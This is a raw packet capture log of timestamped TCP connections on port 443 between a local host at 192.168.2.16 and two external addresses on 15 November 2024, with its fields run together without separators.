                                                                                                            Nov 15, 2024 11:23:38.566643953 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.566710949 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.566732883 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.566800117 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.567765951 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.567822933 CET44349721142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.567902088 CET49721443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.568315983 CET49726443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.568361998 CET44349726142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.568460941 CET49726443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.568713903 CET49726443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.568727016 CET44349726142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.718569040 CET49722443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.718627930 CET49724443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.718632936 CET49723443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.718650103 CET49726443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.765240908 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.765335083 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.765423059 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.765996933 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.766052961 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.766097069 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.766105890 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.766132116 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.766382933 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.766407013 CET44349728142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.766474962 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.766482115 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:38.766496897 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:38.766765118 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:38.766791105 CET44349728142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.630178928 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.630510092 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.631262064 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.631577969 CET44349728142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.631629944 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.632287025 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.632663965 CET44349728142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.633476019 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.637969017 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.637969017 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.638000965 CET44349728142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.638048887 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.638358116 CET44349728142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.638386965 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.638462067 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.638462067 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.638817072 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.638817072 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.661084890 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.661549091 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:39.665849924 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:39.665868044 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.666254044 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.666393042 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:39.667434931 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:39.679333925 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.683329105 CET44349728142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.711338997 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.997046947 CET44349728142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.997298002 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.997342110 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.997440100 CET44349728142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.997531891 CET49728443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.997957945 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:39.998064995 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.998106956 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.998157978 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.998270988 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:39.998437881 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.998437881 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:39.998491049 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:39.998534918 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:39.998558044 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.003985882 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.004332066 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.004348040 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.004447937 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.004447937 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.004535913 CET44349727142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.004740953 CET49727443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.004837990 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.004849911 CET44349735142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.004915953 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.005479097 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.005497932 CET44349735142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.102329016 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.102401972 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.102423906 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.102452993 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.102475882 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.102528095 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.102533102 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.103075981 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.103324890 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.103378057 CET44349729142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.103487968 CET49729443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.104485989 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.104583025 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.104681015 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.104949951 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.104974985 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.856956005 CET44349735142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.857044935 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.857644081 CET44349735142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.857839108 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.859935045 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.859945059 CET44349735142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.860157967 CET44349735142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.860214949 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.860661030 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.860796928 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.860814095 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.860871077 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.860929966 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.861900091 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.862108946 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.862615108 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.862623930 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.862937927 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.862986088 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.863320112 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.863332033 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.863337040 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.863739014 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.863850117 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.864217997 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:40.903356075 CET44349735142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.911331892 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.911339998 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.989185095 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.989299059 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.991491079 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.991517067 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.991889954 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:40.991949081 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:40.992315054 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.039351940 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.223668098 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.223747015 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.223758936 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.223798990 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.223901033 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.223953009 CET44349733142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.224005938 CET49733443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.224075079 CET44349735142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.224147081 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.224486113 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.224544048 CET44349735142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.224602938 CET49735443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.224633932 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.224677086 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.224735975 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.224828959 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.224888086 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.224951029 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.225282907 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.225301981 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.225404978 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:41.225418091 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.257576942 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.257673025 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.257693052 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.257754087 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.257776976 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.257833004 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.257868052 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.257929087 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.258521080 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.258593082 CET44349734142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.258652925 CET49734443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.259162903 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.259203911 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.259269953 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.259587049 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.259602070 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.422967911 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.423057079 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.423089981 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.423142910 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.423186064 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.423239946 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.423276901 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.423523903 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.423949003 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.424019098 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.424371958 CET44349736142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.424431086 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.424464941 CET49736443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.424596071 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.424683094 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:41.424787045 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.425004959 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:41.425039053 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.085767031 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.085865974 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.086848021 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.086926937 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.090143919 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.090164900 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.090514898 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.090620041 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.090706110 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.090779066 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.091078997 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.091799974 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.091854095 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.096246958 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.096267939 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.096616030 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.096739054 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.097105980 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.113388062 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.113472939 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.118319988 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.118335962 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.118669033 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.118717909 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.119095087 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.131340981 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.143336058 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.159354925 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.276536942 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.276631117 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.278446913 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.278464079 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.278812885 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.278868914 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.279290915 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.323329926 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.466259956 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.466331959 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.466362000 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.466564894 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.466564894 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.466701984 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.466770887 CET44349738142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.466844082 CET49738443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.466845036 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.466861963 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.466890097 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.466948032 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.467027903 CET44349737142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.467120886 CET49737443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.467236042 CET49742443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.467329979 CET44349742142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.467355013 CET49743443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.467386961 CET44349743142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.467416048 CET49742443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.467434883 CET49743443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.467628956 CET49742443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.467658043 CET49743443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.467669010 CET44349743142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.467672110 CET44349742142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.521780968 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.521866083 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.521883011 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.521928072 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.522165060 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.522221088 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.522228003 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.522264004 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.522706032 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.522890091 CET44349739142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.522944927 CET49739443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.523428917 CET49744443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.523463964 CET44349744142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.523535013 CET49744443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.523813009 CET49744443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.523828030 CET44349744142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.670929909 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.670999050 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.671027899 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.671152115 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.671298981 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.671344995 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.671355963 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.671392918 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.672569036 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.672619104 CET44349740142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.672674894 CET49740443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.672890902 CET49745443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.672925949 CET44349745142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.673002005 CET49745443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.673263073 CET49745443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.673274994 CET44349745142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.773725033 CET49743443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.773739100 CET49744443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.773823977 CET49745443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:23:42.773837090 CET49742443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.774213076 CET49746443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.774245024 CET44349746142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.774269104 CET49747443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.774296045 CET44349747142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.774297953 CET49746443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.774490118 CET49747443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.774930954 CET49746443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.774945021 CET44349746142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:42.775101900 CET49747443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:42.775124073 CET44349747142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:43.628248930 CET44349747142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:43.628427029 CET49747443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.629321098 CET44349747142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:43.629388094 CET49747443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.630521059 CET44349746142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:43.630636930 CET49746443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.631282091 CET49747443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.631295919 CET44349747142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:43.631603003 CET44349746142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:43.631625891 CET44349747142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:43.631664038 CET49746443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.631694078 CET49747443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.632178068 CET49747443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.632980108 CET49746443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.632997990 CET44349746142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:43.633322001 CET44349746142.250.186.78192.168.2.16
                                                                                                            Nov 15, 2024 11:23:43.633424997 CET49746443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.633764982 CET49746443192.168.2.16142.250.186.78
                                                                                                            Nov 15, 2024 11:23:43.679332972 CET44349747142.250.186.78192.168.2.16
